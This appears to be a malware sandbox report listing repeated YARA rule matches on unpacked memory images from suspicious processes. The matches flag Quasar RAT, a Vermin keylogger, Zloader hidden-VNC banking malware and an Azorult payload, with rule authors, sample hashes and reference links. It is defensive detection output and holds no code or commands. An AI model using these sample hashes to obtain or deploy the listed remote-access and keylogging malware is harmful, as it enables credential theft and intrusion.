Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
